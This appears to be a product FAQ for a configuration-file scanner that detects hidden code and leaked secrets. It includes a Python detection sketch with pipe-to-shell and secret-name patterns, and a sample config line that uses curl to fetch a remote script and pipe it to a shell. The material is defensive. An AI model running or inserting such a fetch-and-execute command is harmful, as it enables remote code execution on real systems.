Find answers to common questions about detecting hidden code in configuration files.
Configuration files like .env, .terraform, docker-compose.yml, and Kubernetes manifests often contain executable patterns, credentials, API keys, and database passwords. Attackers frequently target these files because they often contain the most sensitive infrastructure data. Hidden code patterns in configs can execute during builds or deployments, bypassing standard code review.
The scanner uses pattern recognition to identify code signatures commonly used to inject executable logic into config files. It detects base64 encoding, shell escapes, variable interpolation tricks, and command substitution syntax. It also flags suspicious import statements and external references that could load malicious code at runtime.
Yes. The scanner identifies common patterns for exposed secrets including AWS keys, database credentials, API tokens, and private encryption keys. It recognizes patterns like PRIVATE_KEY=, password:, and secret: assignments across all file types.
The scanner covers all common infrastructure and config file formats:
.env, .env.local

The scanner is tuned to minimize false positives by requiring multiple pattern indicators before flagging a risk. Each finding is scored by confidence level (critical, high, medium, low) so you can prioritize remediation. You can also configure allowlists for legitimate patterns in your environment.
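As an added illustration, not the scanner's own code, the following Python sketch shows the multi-indicator approach described in the answers above: it recognises command substitution, pipe-to-shell, external references, secret-named keys holding literal values, and base64 text blobs in constructed config lines, weights each indicator, honours a hypothetical allowlist, and reports an assignment only when its combined score reaches a threshold. The indicator names, weights, severity cut-offs and sample lines are all assumptions made for this example.

```python
import base64
import re
# Constructed sample config lines (KEY=VALUE and key: value forms); not from any real project.
SAMPLE = """\
DB_PASSWORD=hunter2
API_TOKEN=${VAULT_API_TOKEN}
BUILD_HOOK=$(curl -s http://example.invalid/init.sh | sh)
PAYLOAD=ZWNobyBoZWxsbyB3b3JsZA==
SEED_DATA=ZWNobyBoZWxsbyB3b3JsZA==
"""
ALLOWLIST = {"SEED_DATA"}  # hypothetical per-environment allowlist of keys
ASSIGN = re.compile(r"^\s*([A-Za-z_][\w.-]*)\s*[:=]\s*(.*?)\s*$")
SECRET_NAME = re.compile(r"PASSWORD|PASSWD|SECRET|TOKEN|PRIVATE_KEY|API_KEY", re.I)
VALUE_PATTERNS = [("cmd_subst", r"\$\([^)]*\)|`[^`]*`"),   # $(...) or backticks
                  ("pipe_to_shell", r"\|\s*(ba)?sh\b"),     # | sh / | bash
                  ("external_ref", r"https?://")]           # remote reference
WEIGHTS = {"cmd_subst": 2, "pipe_to_shell": 2, "external_ref": 1, "secret_name": 1,
           "literal_secret": 3, "base64_blob": 1, "base64_text": 1}  # assumed weights
LEVELS = [(5, "critical"), (4, "high"), (3, "medium"), (0, "low")]  # assumed cut-offs

def indicators(key, value):
    """Independent pattern indicators that fire on one key/value assignment."""
    found = [name for name, pat in VALUE_PATTERNS if re.search(pat, value)]
    if SECRET_NAME.search(key):
        found.append("secret_name")
        if value and not value.startswith("${"):  # literal, not an interpolation reference
            found.append("literal_secret")
    if re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", value):
        try:
            decoded = base64.b64decode(value, validate=True)
            found.append("base64_blob")
            if all(32 <= b < 127 for b in decoded):  # decodes to readable text, e.g. a script
                found.append("base64_text")
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    return found

def scan(text, min_score=2):
    """Return (key, severity, indicators) for assignments scoring at least min_score."""
    findings = []
    for line in text.splitlines():
        m = ASSIGN.match(line)
        if not m or m.group(1) in ALLOWLIST:
            continue
        hits = indicators(m.group(1), m.group(2).strip("'\""))
        score = sum(WEIGHTS[h] for h in hits)
        if score >= min_score:
            findings.append((m.group(1), next(n for floor, n in LEVELS if score >= floor), hits))
    return findings
```

With the default threshold, the secret-named key that only references a vault variable scores one point and is not reported, while the base64 line is reported at low severity because two independent indicators agree.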
Yes. The scanner runs as a CLI tool and can be integrated into any CI/CD platform (GitHub Actions, GitLab CI, Jenkins, CircleCI, etc.). It can fail builds if critical risks are found, or run in report-only mode for visibility without blocking deployments.
Yes. The scanner can audit your entire git history to find configuration risks that were committed in the past. This catches secrets that may have been removed from the current branch but still exist in older commits, which remains a security exposure.
Each finding includes remediation guidance. For secrets, rotate or revoke them immediately. For code injection patterns, remove the suspicious logic or refactor the config to use safer alternatives. For dependency risks, audit and update the external reference. The scanner provides severity levels to help you prioritize.
No. The scanner runs locally on your infrastructure. All scanning happens on your machines, and no config files or findings are sent to external servers. This keeps your sensitive data private.
Unlike basic secret scanners that only look for credential patterns, this tool detects hidden code and execution logic in configs. It's designed specifically for supply chain risk and catches risks that general secret scanners miss. It also works across all config file formats, not just source code.
Yes. Configure policies per team or repository to define what patterns are acceptable in your environment. You can allowlist specific patterns, set confidence thresholds, and exclude certain files from scanning. Policies enforce consistency across your infrastructure.